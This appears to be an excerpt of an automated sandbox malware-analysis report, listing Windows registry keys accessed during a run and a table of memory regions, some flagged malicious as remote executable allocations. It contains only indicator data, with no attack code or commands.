HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpv2\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msg\OpenWithProgids
Outlook.File.msg.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ocx\OpenWithProgids
ocxfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odp\OpenWithProgids
PowerPoint.OpenDocumentPresentation.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ods\OpenWithProgids
Excel.OpenDocumentSpreadsheet.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odt\OpenWithProgids
Word.OpenDocumentText.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.otf\OpenWithProgids
otffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids
pngfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pot\OpenWithProgids
PowerPoint.Template.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potm\OpenWithProgids
PowerPoint.TemplateMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potx\OpenWithProgids
PowerPoint.Template.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppam\OpenWithProgids
PowerPoint.Addin.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsm\OpenWithProgids
PowerPoint.SlideShowMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsx\OpenWithProgids
PowerPoint.SlideShow.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppt\OpenWithProgids
PowerPoint.Show.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptm\OpenWithProgids
PowerPoint.ShowMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptx\OpenWithProgids
PowerPoint.Show.12
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
IconStreams
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1xml\OpenWithProgids
Microsoft.PowerShellXMLData.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pssc\OpenWithProgids
Microsoft.PowerShellSessionConfiguration.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rle\OpenWithProgids
rlefile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rtf\OpenWithProgids
Word.RTF.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scf\OpenWithProgids
SHCmdFile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.search-ms\OpenWithProgids
SearchFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldm\OpenWithProgids
PowerPoint.SlideMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldx\OpenWithProgids
PowerPoint.Slide.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance
MessageTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sys\OpenWithProgids
sysfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tif\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff\OpenWithProgids
TIFImage.Document
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttc\OpenWithProgids
ttcfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttf\OpenWithProgids
ttffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TTS\OpenWithProgids
WMP11.AssocFile.TTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids
txtfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vsto\OpenWithProgids
bootstrap.vsto.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\OpenWithProgids
WMP11.AssocFile.WAV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\OpenWithProgids
WMP11.AssocFile.WAX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wdp\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenWithProgids
WMP11.AssocFile.WMA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmf\OpenWithProgids
wmffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithProgids
WMP11.AssocFile.WMV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WPL\OpenWithProgids
WMP11.AssocFile.WPL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithProgids
WMP11.AssocFile.WVX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlam\OpenWithProgids
Excel.AddInMacroEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xls\OpenWithProgids
Excel.Sheet.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsb\OpenWithProgids
Excel.SheetBinaryMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsm\OpenWithProgids
Excel.SheetMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Excel.Sheet.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlt\OpenWithProgids
Excel.Template.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltm\OpenWithProgids
Excel.TemplateMacroEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltx\OpenWithProgids
Excel.Template
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xml\OpenWithProgids
xmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xsl\OpenWithProgids
xslfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\StagingInfo\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
DriveNumber
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ef47ea26-ec76-4a6e-8680-9e53b539546d}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4b110390-e32a-400c-bf41-7fe93773464a}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{b8455d9b-4916-480e-8b44-905b33ca001e}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001036A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010340
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010330
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010332
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010342
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010336
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001032E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001032C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010318
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010314
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001030E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001030C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000102E8
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000102F2
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000102EE
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\$$windows.data.signals.registrations\Current
Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.100
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.101
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance
MessageTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance
MessageTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
TaskbarStateLastRun
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021492-0000-0000-C000-000000000046}\Enum
Implementing
There are 211 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3200000
system
page execute and read and write
malicious
12FD8224000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
E70000
unclassified section
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
12FE0190000
trusted library section
page read and write
malicious
F00A000
unkown
page execute and read and write
malicious
F00A000
unkown
page execute and read and write
malicious
28251060000
trusted library section
page read and write
malicious
9F0000
trusted library allocation
page read and write
malicious
12FD8108000
trusted library allocation
page read and write
malicious
282491DC000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
A1BE000
heap
page read and write
86A1000
heap
page read and write
9EB3000
heap
page read and write
2818952D000
trusted library allocation
page read and write
E94B000
stack
page read and write
7FF511A55000
unkown
page readonly
1225000
heap
page read and write
5936000
heap
page read and write
84BC000
heap
page read and write
EE0000
heap
page read and write
B7C9000
stack
page read and write
83F7000
heap
page read and write
69C3000
unkown
page read and write
E520000
unkown
page read and write
9F59000
heap
page read and write
7FF511601000
unkown
page readonly
7FF51131E000
unkown
page readonly
1A5634A0000
heap
page execute and read and write
7FF511A4D000
unkown
page readonly
E530000
unkown
page read and write
9F77000
heap
page read and write
1C7BF0F1000
trusted library allocation
page read and write
7FF9F1800000
trusted library allocation
page read and write
1E4A8D60000
heap
page read and write
7B4A000
unkown
page readonly
4740000
unkown
page read and write
7FF5119DA000
unkown
page readonly
8389000
heap
page read and write
1C7C7450000
trusted library allocation
page read and write
7FF511847000
unkown
page readonly
85AB000
heap
page read and write
A62B8FD000
stack
page read and write
28239419000
trusted library allocation
page read and write
870A000
stack
page read and write
23395113000
heap
page read and write
7ECA000
unkown
page read and write
7FF5116E0000
unkown
page readonly
D255000
unkown
page readonly
D1F5000
unkown
page readonly
8633000
heap
page read and write
7FF511531000
unkown
page readonly
1A54B6F2000
trusted library allocation
page read and write
EA2000
heap
page read and write
D556000
heap
page read and write
83C8000
heap
page read and write
28251770000
trusted library allocation
page read and write
154FF3E000
stack
page read and write
7FFA5B56D000
unkown
page write copy
9FC9000
heap
page read and write
1130E000
stack
page read and write
E5C000
heap
page read and write
7FF9F18A0000
trusted library allocation
page read and write
9FE8000
heap
page read and write
4780000
unkown
page read and write
816A000
unkown
page read and write
7FF5114C3000
unkown
page readonly
671D000
stack
page read and write
18D54341000
heap
page read and write
C739000
stack
page read and write
7FF511595000
unkown
page readonly
7FF5113D1000
unkown
page readonly
5160000
unkown
page read and write
18D542C0000
heap
page read and write
D04A000
unkown
page readonly
868C000
heap
page read and write
F51F7FA000
stack
page read and write
7FF51166A000
unkown
page readonly
E8A5000
unkown
page read and write
508B000
stack
page read and write
28251071000
trusted library allocation
page read and write
9CFB000
stack
page read and write
20626220000
trusted library allocation
page read and write
855D000
heap
page read and write
836D000
heap
page read and write
7FF51177D000
unkown
page readonly
7FF511529000
unkown
page readonly
2823700E000
heap
page read and write
997B000
stack
page read and write
4FC0000
trusted library allocation
page read and write
7FF51160D000
unkown
page readonly
DD0A000
stack
page read and write
18D54490000
trusted library allocation
page read and write
4B00000
trusted library allocation
page execute and read and write
13D5000
heap
page read and write
E1F6000
unkown
page read and write
7FF9F1860000
trusted library allocation
page read and write
12FC8286000
trusted library allocation
page read and write
2E8E000
stack
page read and write
48B0000
unkown
page read and write
9E9D000
heap
page read and write
60ED000
heap
page read and write
4880000
unkown
page read and write
1C7C7450000
trusted library allocation
page read and write
2CCE17F000
stack
page read and write
BF0000
unkown
page readonly
2A90000
heap
page read and write
8590000
heap
page read and write
D255000
unkown
page readonly
9EB0000
heap
page read and write
2060E319000
trusted library allocation
page read and write
CFE2000
unkown
page readonly
20626210000
trusted library allocation
page read and write
7727000
system
page read and write
7FF5119C4000
unkown
page readonly
7FF51185A000
unkown
page readonly
8649000
heap
page read and write
D1AC000
unkown
page readonly
7DF4197A1000
trusted library allocation
page execute read
5190000
unkown
page read and write
751D000
stack
page read and write
A187000
heap
page read and write
1C7C7450000
trusted library allocation
page read and write
12FC60D0000
trusted library allocation
page read and write
7ED2000
unkown
page read and write
3070000
unkown
page read and write
DF55000
heap
page read and write
1C7C7450000
trusted library allocation
page read and write
DF74000
heap
page read and write
5893000
heap
page read and write
8587000
heap
page read and write
1039B000
heap
page read and write
2D60000
heap
page read and write
28187535000
heap
page read and write
7DF419780000
trusted library allocation
page readonly
7FF5114EC000
unkown
page readonly
2F12000
heap
page read and write
A194000
heap
page read and write
10E0F000
stack
page read and write
7FF9F1776000
trusted library allocation
page read and write
7D2C000
unkown
page readonly
103C1000
heap
page read and write
7FF5117F4000
unkown
page readonly
7FF9F1930000
trusted library allocation
page read and write
60C1000
heap
page read and write
85F2000
heap
page read and write
7350000
trusted library allocation
page read and write
7A47000
unkown
page readonly
28251770000
trusted library allocation
page read and write
8175000
unkown
page read and write
CA72000
unkown
page readonly
A06F000
heap
page read and write
B9CA000
stack
page read and write
8554000
heap
page read and write
28251770000
trusted library allocation
page read and write
85DE000
heap
page read and write
7FF511496000
unkown
page readonly
7FF5116F0000
unkown
page readonly
3124000
heap
page read and write
1C7AD120000
unkown
page read and write
12FE08E0000
trusted library allocation
page read and write
463F80E000
stack
page read and write
A065000
heap
page read and write
72C0000
trusted library allocation
page read and write
592A000
heap
page read and write
7FF1000
unkown
page read and write
D490000
trusted library allocation
page read and write
8631000
heap
page read and write
7FF51163D000
unkown
page readonly
1A54B85C000
trusted library allocation
page read and write
2060DA70000
trusted library allocation
page read and write
103E1000
heap
page read and write
12FE0890000
trusted library allocation
page read and write
1A54B240000
heap
page read and write
84E2000
heap
page read and write
D21E000
unkown
page readonly
4750000
unkown
page read and write
7FF9F17D0000
trusted library allocation
page read and write
D1AC000
unkown
page readonly
596E000
heap
page read and write
1A563537000
heap
page execute and read and write
9F71000
heap
page read and write
E41A000
stack
page read and write
8523000
heap
page read and write
3260000
trusted library allocation
page read and write
85F6000
heap
page read and write
816A000
unkown
page read and write
60ED000
heap
page read and write
2EEF000
unkown
page read and write
60ED000
heap
page read and write
7FF3000
unkown
page read and write
CF4F000
unkown
page readonly
DE50000
trusted library allocation
page read and write
7FF9F1790000
trusted library allocation
page execute and read and write
7FF511692000
unkown
page readonly
84E9000
heap
page read and write
2016A03C000
heap
page read and write
7FF9F18E0000
trusted library allocation
page read and write
2EDC000
heap
page read and write
4F0C000
stack
page read and write
596E000
heap
page read and write
EE9B000
unkown
page read and write
1A10B0D5000
heap
page read and write
4F9E000
stack
page read and write
18D54FB0000
trusted library allocation
page read and write
CDC7000
unkown
page readonly
7FF9F1850000
trusted library allocation
page read and write
7727000
system
page read and write
2EB0000
unkown
page read and write
2F82000
heap
page read and write
31C5000
heap
page read and write
7FF51194E000
unkown
page readonly
AFCD000
stack
page read and write
A0A3000
heap
page read and write
7FF51166A000
unkown
page readonly
6089000
heap
page read and write
9EB5000
heap
page read and write
5F20000
heap
page read and write
1A10CB10000
heap
page read and write
12FC61F5000
heap
page read and write
2060E5D9000
trusted library allocation
page read and write
8441000
heap
page read and write
316C000
heap
page read and write
822E000
unkown
page read and write
28251070000
trusted library allocation
page read and write
7540000
unkown
page readonly
96FD000
stack
page read and write
281896E4000
trusted library allocation
page read and write
20626230000
trusted library allocation
page read and write
A0B8000
heap
page read and write
12FC6060000
heap
page read and write
E180000
unkown
page read and write
D11C000
unkown
page readonly
473A000
unkown
page read and write
7FF511685000
unkown
page readonly
7FF511A43000
unkown
page readonly
858C000
stack
page read and write
48E0000
unkown
page read and write
8602000
heap
page read and write
1A56354F000
heap
page read and write
588D000
heap
page read and write
692E000
stack
page read and write
EE0000
heap
page read and write
7FF51148C000
unkown
page readonly
282393D9000
trusted library allocation
page read and write
83D3000
heap
page read and write
9F6F000
heap
page read and write
9EE5000
heap
page read and write
7FF5114B7000
unkown
page readonly
2A90000
heap
page read and write
BD0000
unkown
page readonly
EA8B000
stack
page read and write
8390000
heap
page read and write
4CCA000
stack
page read and write
7FF51194E000
unkown
page readonly
7FF9F1686000
trusted library allocation
page read and write
7FF511850000
unkown
page readonly
3640000
heap
page read and write
8150000
unkown
page read and write
103C8000
heap
page read and write
B04B000
stack
page read and write
7FF511959000
unkown
page readonly
2823988E000
trusted library allocation
page read and write
937C000
stack
page read and write
FA0000
unkown
page readonly
282518C0000
trusted library allocation
page read and write
4BE8000
stack
page read and write
7C8E000
unkown
page readonly
32C0000
unkown
page read and write
7FF511622000
unkown
page readonly
A18A000
heap
page read and write
F04000
heap
page read and write
7FF51154E000
unkown
page readonly
69A6000
unkown
page read and write
45A000
heap
page read and write
7FF9F17D0000
trusted library allocation
page read and write
103F1000
heap
page read and write
1C7C7420000
trusted library allocation
page read and write
281872AA000
heap
page read and write
1025000
heap
page read and write
607D000
heap
page read and write
4730000
unkown
page read and write
E32F000
unkown
page read and write
60ED000
heap
page read and write
49A3000
heap
page read and write
12FC5E60000
remote allocation
page read and write
A097000
heap
page read and write
D00000
remote allocation
page read and write
28187210000
heap
page read and write
20626220000
trusted library allocation
page read and write
7ED4000
unkown
page read and write
7FF5115C6000
unkown
page readonly
E194000
unkown
page read and write
7FF9F1910000
trusted library allocation
page read and write
E88A000
stack
page read and write
1A56344F000
heap
page read and write
7FF511A3B000
unkown
page readonly
82F1000
heap
page read and write
997B000
stack
page read and write
2060D960000
heap
page read and write
281A12B0000
trusted library allocation
page read and write
FF97000
heap
page read and write
1483000
unkown
page readonly
28189091000
trusted library allocation
page read and write
D04E000
unkown
page readonly
9ED1000
heap
page read and write
7FF9F18C0000
trusted library allocation
page read and write
DF74000
heap
page read and write
7FF51173D000
unkown
page readonly
9DD000
stack
page read and write
8534000
heap
page read and write
D59D000
heap
page read and write
E18E000
stack
page read and write
E16F000
unkown
page read and write
7333000
trusted library allocation
page read and write
2E91000
unkown
page read and write
7FF9F15D4000
trusted library allocation
page read and write
4A0B000
unkown
page read and write
D6BB000
stack
page read and write
281A1F88000
heap
page read and write
7FF51196C000
unkown
page readonly
7FF9F1900000
trusted library allocation
page read and write
A0A4000
heap
page read and write
1A10B0B5000
heap
page read and write
1C7C72E9000
heap
page read and write
15629340000
heap
page read and write
3285000
stack
page read and write
282517D0000
trusted library allocation
page read and write
E52C000
unkown
page read and write
2EEC000
unkown
page read and write
756B000
unkown
page readonly
817E000
unkown
page read and write
154FAFD000
stack
page read and write
7FF51123B000
unkown
page readonly
7FF9F16C0000
trusted library allocation
page execute and read and write
9F71000
heap
page read and write
868A000
heap
page read and write
A059000
heap
page read and write
6089000
heap
page read and write
7DF425C51000
unkown
page execute read
58CA000
heap
page read and write
8601000
heap
page read and write
1A10D2FD000
heap
page read and write
2E0A000
stack
page read and write
2BF0000
unkown
page readonly
1C7AFEE7000
trusted library allocation
page read and write
2F74000
heap
page read and write
EA8B000
stack
page read and write
12FE07D0000
trusted library allocation
page read and write
A1DA000
heap
page read and write
1A54B5C2000
trusted library allocation
page read and write
7FF5119E5000
unkown
page readonly
27E30180000
heap
page read and write
A4B9000
stack
page read and write
26AC6890000
remote allocation
page read and write
A63B000
stack
page read and write
811E000
unkown
page read and write
86AB000
heap
page read and write
85F8000
heap
page read and write
118DE000
stack
page read and write
85BA000
heap
page read and write
7FFA594F0000
unkown
page read and write
D21E000
unkown
page readonly
D17C000
unkown
page readonly
308A000
stack
page read and write
1040000
unkown
page read and write
B1CC000
stack
page read and write
85D2000
heap
page read and write
9F69000
heap
page read and write
328B000
stack
page read and write
59BE000
heap
page read and write
D22C000
unkown
page readonly
8644000
heap
page read and write
31CF000
heap
page read and write
EC40000
heap
page read and write
5F8A000
heap
page read and write
7FF9F17B6000
trusted library allocation
page read and write
F9A000
heap
page read and write
554000
heap
page read and write
1C7AD17C000
heap
page read and write
12FE04C0000
trusted library allocation
page read and write
103A7000
heap
page read and write
D13C000
unkown
page readonly
12FC5F9C000
heap
page read and write
2016A028000
heap
page read and write
7FF511574000
unkown
page readonly
D59D000
heap
page read and write
2061DF71000
trusted library allocation
page read and write
FF4A000
stack
page read and write
7FF51195E000
unkown
page readonly
4980000
unkown
page readonly
2016A100000
heap
page read and write
84E9000
heap
page read and write
752A000
system
page read and write
2ECC000
heap
page read and write
8696000
heap
page read and write
C98A000
stack
page read and write
12FE07E0000
trusted library allocation
page read and write
D272000
unkown
page readonly
2062626E000
heap
page read and write
D552000
heap
page read and write
D3C0000
system
page execute and read and write
EF14000
unkown
page read and write
E52A000
unkown
page read and write
C8BB000
stack
page read and write
A1D7000
heap
page read and write
2F64000
unkown
page read and write
1C7AD0C0000
heap
page read and write
E49E000
stack
page read and write
5FD1000
heap
page read and write
12FE01A0000
trusted library allocation
page read and write
554000
heap
page read and write
86AB000
heap
page read and write
F90000
trusted library section
page readonly
CE97000
unkown
page readonly
1E4A90B0000
heap
page read and write
7DF45EE30000
trusted library allocation
page readonly
8364000
heap
page read and write
79F1000
unkown
page readonly
28236F69000
heap
page read and write
DBBF000
stack
page read and write
84A9000
heap
page read and write
31D1000
heap
page read and write
281A2015000
heap
page read and write
28189090000
trusted library allocation
page read and write
2060DF60000
heap
page read and write
10D8E000
stack
page read and write
26AC6A13000
heap
page read and write
5890000
heap
page read and write
5981000
heap
page read and write
26AC6770000
trusted library allocation
page read and write
E08E000
stack
page read and write
7070000
heap
page read and write
CFD4000
unkown
page readonly
D6BB000
stack
page read and write
1020000
heap
page read and write
12FE0180000
trusted library allocation
page read and write
9EDE000
heap
page read and write
70FB000
stack
page read and write
2E8E000
stack
page read and write
D4F0000
trusted library allocation
page read and write
27E3027C000
heap
page read and write
7FF511318000
unkown
page readonly
7FF5117F4000
unkown
page readonly
7FF511557000
unkown
page readonly
4880000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
CFE2000
unkown
page readonly
7EE5000
unkown
page read and write
7C13000
unkown
page readonly
103CA000
heap
page read and write
4700000
unkown
page read and write
7FF5117CF000
unkown
page readonly
D7BB000
stack
page read and write
1A5494EC000
heap
page read and write
7FF9F1880000
trusted library allocation
page read and write
28189090000
trusted library allocation
page read and write
59AF000
heap
page read and write
7FF511514000
unkown
page readonly
7FF5119E5000
unkown
page readonly
7FFA5BB60000
unkown
page readonly
7B4A000
unkown
page readonly
FFD6000
heap
page read and write
69A9000
unkown
page read and write
832A000
heap
page read and write
C9C2000
unkown
page readonly
81EF000
stack
page read and write
8523000
heap
page read and write
7FF9F15D0000
trusted library allocation
page read and write
12FE07C0000
trusted library allocation
page read and write
DD3B000
stack
page read and write
7FFA5BCF3000
unkown
page read and write
D8BC000
stack
page read and write
4720000
trusted library section
page read and write
8044000
unkown
page read and write
7FF9F1920000
trusted library allocation
page read and write
1C7C7450000
trusted library allocation
page read and write
D513000
trusted library allocation
page read and write
7FF9F16F0000
trusted library allocation
page execute and read and write
9E99000
heap
page read and write
A3F88FB000
stack
page read and write
7FF5119C4000
unkown
page readonly
7FFA5BCFA000
unkown
page read and write
554000
heap
page read and write
6052000
heap
page read and write
1A10D33F000
heap
page read and write
12FE0810000
trusted library allocation
page read and write
3107000
stack
page read and write
A1EA000
heap
page read and write
5410000
unkown
page readonly
1025000
heap
page read and write
49AD000
heap
page read and write
A1B9000
heap
page read and write
2C89000
stack
page read and write
9EB7000
heap
page read and write
1200000
heap
page read and write
8408000
heap
page read and write
AFCD000
stack
page read and write
32B0000
unkown
page readonly
12FC8CA5000
trusted library allocation
page read and write
A1F7000
heap
page read and write
7FF511750000
unkown
page readonly
D0AC000
unkown
page readonly
7FF9F1867000
trusted library allocation
page read and write
A1B9000
heap
page read and write
103A2000
heap
page read and write
49BB000
heap
page read and write
12FE04C0000
trusted library allocation
page read and write
99FC000
stack
page read and write
7FF511685000
unkown
page readonly
D4A5000
trusted library allocation
page read and write
26AC6774000
trusted library allocation
page read and write
4890000
unkown
page read and write
7FF9F15C0000
trusted library allocation
page read and write
6089000
heap
page read and write
12FDFF6B000
heap
